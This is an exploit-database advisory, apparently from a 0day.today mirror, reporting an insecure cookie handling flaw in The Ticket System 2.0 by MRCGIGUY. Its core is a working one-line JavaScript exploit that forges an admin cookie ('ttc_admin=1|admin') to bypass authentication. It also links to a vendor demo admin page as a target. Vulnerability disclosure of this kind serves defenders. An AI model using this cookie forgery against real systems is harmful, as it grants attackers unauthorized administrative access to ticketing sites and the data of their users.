id: 5170
date: 05/13/2009
title: MRCGIGUY The Ticket System 2.0 Insecure Cookie Handling Vuln
author: TiGeR-Dz
cves: 

============================================================
MRCGIGUY The Ticket System 2.0 Insecure Cookie Handling Vuln
============================================================


---------------------------------------------------------------
The Ticket System / The Ticket System PHP Version 2.0 Insecure Cookie Handling Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:http://www.mrcgiguy.com
Script:The Ticket System / The Ticket System PHP Version 2.0
Download:http://www.mrcgiguy.com/the_ticket_system.html
---------------------------------------------------------------
Exploit
-------
javascript:document.cookie="ttc_admin=1%7Cadmin;path=/";
----------------------------------------------------------------
Dem0
----
http://www.mrcgiguy.com/cgi-bin/tts-demo/admin.cgi
--------------------------------------




#  0day.today [2023-03-26]  #